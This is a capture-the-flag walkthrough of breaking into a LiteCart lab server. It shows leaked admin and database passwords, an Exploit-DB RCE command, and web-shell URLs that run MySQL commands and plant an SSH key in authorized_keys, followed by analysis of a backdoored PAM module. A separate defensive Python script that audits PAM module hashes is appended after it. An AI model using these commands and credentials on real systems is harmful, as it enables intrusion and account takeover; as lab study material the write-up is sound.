From the quick nmap scan I saw that two ports were open: SSH and HTTP.

Browsing to port 80, I found that the site is running LiteCart.

Running gobuster, I found a /backup directory.

From there I got a tar file, which I downloaded to my local machine.

In the file shop/admin/login.php from the tar archive I found a new location to browse to.

Browsing to it, I got the admin password:

username: admin
password: theNextGenSt0r3!~

Logging in with the above credentials at /shop/admin, I was able to confirm the version of LiteCart.


https://www.exploit-db.com/exploits/45267
This exploit will not work directly. I made some edits to the file, and along with a PHP bypass file I was able to get RCE. I took the bypass code from the exploit below:
https://www.exploit-db.com/exploits/47462

python LiteCart.py -p 'theNextGenSt0r3!~' -u admin -t http://10.10.10.207/shop/admin/

I got RCE in the browser.


Running the following, I found that the commands execute as the mysql user:

http://10.10.10.207/shop/vqmod/xml/mybypass.php?c=mysql -u root -pchangethis -e "select exec_cmd('whoami')"

I generated a key pair on my local machine and wrote the public key into the mysql user's authorized_keys:

http://10.10.10.207/shop/vqmod/xml/mybypass.php?c=mysql -u root -pchangethis -e "select exec_cmd('echo *public key* > /var/lib/mysql/.ssh/authorized_keys')"

I replaced the mysql user's key with the key I generated, so now I should be able to SSH into the system as the mysql user.
After logging in and enumerating the files I got an interesting output:

Password = 3*NLJE32I$Fe

I tried to SSH in as sysadmin using this password.

With the clue I got, I searched for recently modified files and found /lib/x86_64-linux-gnu/security/.pam_unix.so. I downloaded the file:

scp [email protected]:/lib/x86_64-linux-gnu/security/pam_unix.so ./pam.so

I opened it using Ghidra.

I started a new project and then just dragged the .so file onto the application.

Opening the authenticate function:

This is equivalent to zlke~U3Env82m2-
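As an added defender-side example (not part of the original writeup), here is a Python check that would flag a swapped PAM module like the one found above: it compares every file in a PAM module directory against known-good hashes and reports files the baseline never listed (such as a dot-prefixed copy) or files modified recently. The directory, file contents and baseline in demo() are constructed; on a real host the baseline would come from the distribution's package checksums or a golden image.

```python
import hashlib
import os
import tempfile
import time

def sha256_of(path):
    """SHA-256 of a file on disk, read in chunks so large modules are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def audit_modules(module_dir, baseline, recent_days=30, now=None):
    """Compare every file in module_dir with baseline {filename: sha256}.
    Reports modules whose hash changed, files the baseline never listed
    (such as a dot-prefixed copy) and anything modified within recent_days."""
    now = time.time() if now is None else now
    report = {"modified": [], "unknown": [], "recent": []}
    for name in sorted(os.listdir(module_dir)):
        path = os.path.join(module_dir, name)
        if not os.path.isfile(path):
            continue
        if name not in baseline:
            report["unknown"].append(name)
        elif sha256_of(path) != baseline[name]:
            report["modified"].append(name)
        if now - os.path.getmtime(path) < recent_days * 86400:
            report["recent"].append(name)
    return report

def demo():
    """Constructed scenario (not a real host): one pristine module, a tampered
    pam_unix.so and a hidden .pam_unix.so that no package ever shipped."""
    pristine_unix, pristine_permit = b"\x7fELF pam_unix", b"\x7fELF pam_permit"
    baseline = {"pam_unix.so": hashlib.sha256(pristine_unix).hexdigest(),
                "pam_permit.so": hashlib.sha256(pristine_permit).hexdigest()}
    files = {"pam_permit.so": pristine_permit,
             "pam_unix.so": b"\x7fELF pam_unix with hardcoded password",
             ".pam_unix.so": pristine_unix}
    old = time.time() - 400 * 86400  # untouched since install
    with tempfile.TemporaryDirectory() as d:
        for name, data in files.items():
            path = os.path.join(d, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.utime(path, (old, old) if name == "pam_permit.so" else None)
        return audit_modules(d, baseline)
```

On a live system, point audit_modules at /lib/x86_64-linux-gnu/security with a baseline built from a trusted source; a module that is both modified and recently touched is the first thing to pull into Ghidra.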
